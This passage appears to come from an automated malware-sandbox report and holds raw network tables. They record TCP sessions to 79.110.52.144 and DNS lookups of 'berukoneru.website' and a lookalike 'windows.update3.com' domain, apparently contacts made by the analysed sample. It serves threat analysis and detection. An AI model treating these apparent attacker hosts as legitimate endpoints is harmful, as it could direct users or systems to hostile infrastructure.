                            Dec 14, 2021 10:21:39.861406088 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.861552954 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.861593962 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.861665010 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.861682892 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.861712933 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.861733913 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.862003088 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.862041950 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.862112045 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.862127066 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.862145901 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.862176895 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.862404108 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.862440109 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.862495899 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.862514019 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.862533092 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.862581968 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.863373995 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.863413095 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.863481045 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.863492966 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.863516092 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.863534927 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.863564968 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.863666058 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.863895893 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.864196062 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.865024090 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.865048885 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.865123034 CET49819443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.865138054 CET4434981979.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.904871941 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.925302982 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.925340891 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.925645113 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.926302910 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.926326036 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945446014 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945509911 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945528984 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945565939 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945583105 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.945585966 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945605993 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945646048 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.945658922 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.945686102 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.945735931 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.946459055 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.946521044 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.946567059 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.946605921 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.946643114 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.946715117 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.969054937 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.969101906 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.969177008 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.969198942 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.969238997 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.969269037 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.970139980 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.970256090 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.970276117 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.970376968 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.970979929 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.971021891 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.971066952 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.971080065 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.971219063 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.971302986 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.992409945 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.992444038 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.992516994 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.992537022 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.992579937 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.992604017 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.993185043 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.993206024 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.993280888 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.993297100 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.993346930 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.994023085 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.994050980 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.994102001 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.994112968 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.994148970 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.994185925 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.994430065 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.994457960 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.994514942 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.994524956 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.994565964 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.994640112 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.995099068 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.995126009 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.995187044 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.995197058 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.995353937 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.995358944 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.995440960 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.995469093 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.995528936 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.995538950 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.995560884 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.995583057 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.013417959 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.013533115 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.015100956 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.015117884 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.015575886 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016118050 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016175032 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016231060 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.016243935 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016259909 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.016288042 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.016438961 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016479969 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016514063 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.016522884 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016551018 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.016572952 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.016916037 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016973019 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.016999006 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017008066 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.017055035 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017076015 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017349958 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.017401934 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.017422915 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017429113 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.017461061 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017482996 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017869949 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018013954 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018054008 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018167019 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018176079 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018184900 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018189907 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018250942 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018253088 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018332958 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.019790888 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.021358013 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.021373987 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.021435022 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.021445036 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.036642075 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.036705971 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.036819935 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.037522078 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.037543058 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.064874887 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079672098 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079788923 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079900980 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079957008 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080010891 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080570936 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080594063 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.080688000 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080698967 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.119164944 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.119303942 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.121375084 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.121393919 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.121696949 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.123877048 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.164869070 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202713966 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202754974 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202840090 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202900887 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204139948 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204320908 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204350948 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.204624891 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204637051 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.510907888 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.510943890 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.511760950 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.511806011 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.511816025 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.590121031 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.590529919 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.591964006 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.591984034 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.592453003 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.594264984 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.636878967 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662166119 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662188053 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662326097 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662374973 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662494898 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662801981 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662818909 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662827015 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662837982 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.839658976 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.839715958 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.839895010 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.843355894 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.843389034 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.922907114 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.923186064 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.925105095 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.925117016 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.925614119 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.929003000 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.972866058 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977659941 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977699041 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977782965 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977938890 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.978286982 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.978313923 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.978327036 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.978338957 CET4434982579.110.52.144192.168.2.6

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 14, 2021 10:21:27.879158020 CET6211653192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:27.897459030 CET53621168.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:28.005357981 CET6381653192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:28.022103071 CET53638168.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:28.100939989 CET5501453192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:28.121263027 CET53550148.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:28.618268013 CET6220853192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:28.635057926 CET53622088.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:38.683651924 CET5181853192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:38.706058979 CET53518188.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:38.937886000 CET5662853192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:38.955063105 CET53566288.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:39.074219942 CET6077853192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:39.093746901 CET53607788.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:39.206109047 CET5379953192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:39.223566055 CET53537998.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:39.301306009 CET5468353192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:39.320144892 CET53546838.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:39.382054090 CET5932953192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:39.399878979 CET53593298.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:39.611248016 CET6402153192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:39.629395008 CET53640218.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:39.729481936 CET5612953192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:39.748024940 CET53561298.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:39.907537937 CET5817753192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:39.923528910 CET53581778.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:40.019191027 CET5070053192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:40.035238981 CET53507008.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:40.492409945 CET5406953192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:40.508769035 CET53540698.8.8.8192.168.2.6
                            Dec 14, 2021 10:21:40.775444984 CET6117853192.168.2.68.8.8.8
                            Dec 14, 2021 10:21:40.791791916 CET53611788.8.8.8192.168.2.6
                            Dec 14, 2021 10:22:41.757524967 CET5518153192.168.2.68.8.8.8
                            Dec 14, 2021 10:22:41.773610115 CET53551818.8.8.8192.168.2.6
                            Dec 14, 2021 10:22:41.779015064 CET5518253192.168.2.68.8.8.8
                            Dec 14, 2021 10:22:41.797523975 CET53551828.8.8.8192.168.2.6

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Dec 14, 2021 10:21:27.879158020 CET192.168.2.68.8.8.80xe710Standard query (0)windows.update3.comA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.005357981 CET192.168.2.68.8.8.80x8816Standard query (0)windows.update3.comA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.100939989 CET192.168.2.68.8.8.80x9c94Standard query (0)windows.update3.comA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.618268013 CET192.168.2.68.8.8.80x9cd0Standard query (0)windows.update3.comA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:38.683651924 CET192.168.2.68.8.8.80x766eStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:38.937886000 CET192.168.2.68.8.8.80x1f47Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.074219942 CET192.168.2.68.8.8.80x1098Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.206109047 CET192.168.2.68.8.8.80x3ff7Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.301306009 CET192.168.2.68.8.8.80x48beStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.382054090 CET192.168.2.68.8.8.80xc3c5Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.611248016 CET192.168.2.68.8.8.80xdf42Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.729481936 CET192.168.2.68.8.8.80xbf7bStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.907537937 CET192.168.2.68.8.8.80xd2f2Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:40.019191027 CET192.168.2.68.8.8.80xbbbaStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:40.492409945 CET192.168.2.68.8.8.80x1433Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:40.775444984 CET192.168.2.68.8.8.80xe94fStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                            Dec 14, 2021 10:22:41.757524967 CET192.168.2.68.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                            Dec 14, 2021 10:22:41.779015064 CET192.168.2.68.8.8.80x2Standard query (0)1.0.0.127.in-addr.arpaPTR (Pointer record)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Dec 14, 2021 10:21:27.897459030 CET8.8.8.8192.168.2.60xe710No error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                            Dec 14, 2021 10:21:27.897459030 CET8.8.8.8192.168.2.60xe710No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:27.897459030 CET8.8.8.8192.168.2.60xe710No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:27.897459030 CET8.8.8.8192.168.2.60xe710No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET8.8.8.8192.168.2.60x8816No error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET8.8.8.8192.168.2.60x8816No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET8.8.8.8192.168.2.60x8816No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET8.8.8.8192.168.2.60x8816No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET8.8.8.8192.168.2.60x9c94No error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET8.8.8.8192.168.2.60x9c94No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET8.8.8.8192.168.2.60x9c94No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET8.8.8.8192.168.2.60x9c94No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.635057926 CET8.8.8.8192.168.2.60x9cd0No error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                            Dec 14, 2021 10:21:28.635057926 CET8.8.8.8192.168.2.60x9cd0No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.635057926 CET8.8.8.8192.168.2.60x9cd0No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:28.635057926 CET8.8.8.8192.168.2.60x9cd0No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:38.706058979 CET8.8.8.8192.168.2.60x766eNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:38.955063105 CET8.8.8.8192.168.2.60x1f47No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.093746901 CET8.8.8.8192.168.2.60x1098No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.223566055 CET8.8.8.8192.168.2.60x3ff7No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.320144892 CET8.8.8.8192.168.2.60x48beNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.399878979 CET8.8.8.8192.168.2.60xc3c5No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.629395008 CET8.8.8.8192.168.2.60xdf42No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.748024940 CET8.8.8.8192.168.2.60xbf7bNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:39.923528910 CET8.8.8.8192.168.2.60xd2f2No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:40.035238981 CET8.8.8.8192.168.2.60xbbbaNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:40.508769035 CET8.8.8.8192.168.2.60x1433No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:21:40.791791916 CET8.8.8.8192.168.2.60xe94fNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                            Dec 14, 2021 10:22:41.773610115 CET8.8.8.8192.168.2.60x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                            Dec 14, 2021 10:22:41.797523975 CET8.8.8.8192.168.2.60x2Name error (3)1.0.0.127.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)

                            HTTP Request Dependency Graph

                            • berukoneru.website

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
